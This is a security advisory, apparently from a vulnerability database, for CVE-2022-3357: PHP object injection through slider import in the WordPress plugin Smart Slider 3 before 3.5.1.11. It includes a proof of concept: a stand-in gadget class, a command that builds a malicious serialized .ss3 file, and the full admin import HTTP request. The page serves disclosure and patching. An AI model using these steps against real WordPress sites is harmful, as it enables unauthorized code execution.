Lucene search
Nguyen Duy Quoc KhanhWPEX-ID:2E28A4E7-E7D3-485C-949C-E300E5B66CBDHistoryOct 10, 2022 - 12:00 a.m.
Smart Slider 3 < 3.5.1.11 - PHP Object Injection
2022-10-1000:00:00
Nguyen Duy Quoc Khanh
154
smart slider 3
php object injection
slider import
gadget chain
arbitrary deserialization
security exploit
wordpress
EPSS
0.001
Percentile
42.9%
The plugin unserialises the content of an imported file, which could lead to PHP object injection issues when a user import (intentionally or not) a malicious file, and a suitable gadget chain is present on the site.
To simulate a gadget chain, put the following code in a plugin
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Create a fake slider:
echo 'O:4:"Evil":0:{};' > data && zip EvilSlider.ss3 data
And import the fake slider in the Smart Slider 3 dashboard.
POST /wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=sliders&nextendaction=import&groupID=0&nextend_nonce=e771567d65 HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------304866225113075420131015772767
Content-Length: 1416
Cookie:[admin+]
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="nextend_nonce"
e771567d65
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[upload_or_local]"
0
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[import-file]"; filename="My project(2).ss3"
Content-Type: application/octet-stream
[File data]
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="selectslider[local-import-file]"
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[local-import-file]"
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[delete]"
0
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[restore]"
0
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="selectslider[image-mode]"
clone
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[image-mode]"
clone
-----------------------------304866225113075420131015772767--
Related
nvd
nvd
CVE-2022-3357
2022-10-31 16:15:11
openvas
openvas
WordPress Smart Slider 3 Plugin < 3.5.1.11 Object Injection Vulnerability
2023-03-14 00:00:00
cve
cve
CVE-2022-3357
2022-10-31 16:15:11
prion
prion
Design/Logic Flaw
2022-10-31 16:15:00
patchstack
patchstack
wpvulndb
wpvulndb
Smart Slider 3 < 3.5.1.11 - PHP Object Injection
2022-10-10 00:00:00
cvelist
cvelist
CVE-2022-3357 Smart Slider 3 < 3.5.1.11 - PHP Object Injection
2022-10-31 00:00:00
githubexploit
githubexploit
Exploit for Privilege Context Switching Error in Canonical Ubuntu Linux
2024-07-04 17:29:28